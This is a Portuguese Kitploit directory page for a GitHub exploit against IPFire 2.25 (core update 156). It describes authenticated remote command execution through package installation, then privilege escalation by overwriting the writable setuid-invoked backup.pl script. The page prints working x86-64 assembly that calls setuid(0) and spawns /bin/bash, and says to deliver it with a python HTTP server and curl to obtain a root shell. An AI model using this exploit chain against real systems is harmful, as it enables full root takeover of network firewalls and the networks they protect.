Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ipfire-2-25-auth-rce — ipfire 2.25 authenticated remote code execution | Kitploit
Ferramentas/GitHubGitHub/kaanaryoverflow/ipfire-2-25-auth-rce
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPayload DevelopmentBinary Exploitation
GitHubkaanaryoverflow/ipfire-2-25-auth-rce

ipfire-2-25-auth-rce

ipfire 2.25 authenticated remote code execution

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
2há 5 anosAinda não revisado

Ipfire 2-25 (core update 156) rce autenticado

  • o sistema executa o comando ao instalar qualquer pacote

packfileinstallation

  • o sistema obtém 7zip a partir de apenas html

pocpc0

  • e verifica o diretório tmp

pocpc1

  • versão 2.25 - core update 156

version

  • o ipfire permite executar comandos arbitrários do sistema operacional como nobody após o login

Seja root!

  • verifica os binários suid

find-suid

  • o programa de backup executa outro script. /var/ipfire/backup/bin/backup.pl (é um script bash e a permissão parece boa)

backup-tespiti

  • tenta escrever no script bash. (Sem erro. BOM!)

yazma-denemesi

  • tenta executar o bash

yazabilme-kanıtı

  • sim. podemos executar, mas é com privilégios baixos. precisamos acionar o setuid(0)!
  • salve isso e execute alti name.asm q
  • alti é meu próprio programa de verificação de compilação no repositório soo_deep.
root@kitploit:~
bits 64
section .data
  string db "/bin/bash",0x00
  olmadis db "basarisiz.",0x0a,0x00
  olmadil equ $-olmadis
section .text
  global main
main:
  mov rax,105
  mov rdi,0
  syscall
  cmp rax,0
  je getbash

  mov rax,1
  mov rdi,1
  mov rsi,olmadis
  mov rdx,olmadil
  syscall

  mov rax,60
  xor rdi,rdi
  syscall

getbash:
  mov rax,59
  mov rdi,string
  mov rsi,0
  mov rdx,0
  syscall
  • e escreva o novo programa em /var/ipfire/backup/bin/backup.pl. (podemos usar python http server e curl para escrever)

  • e aproveite o shell root!

image

Baixar ferramenta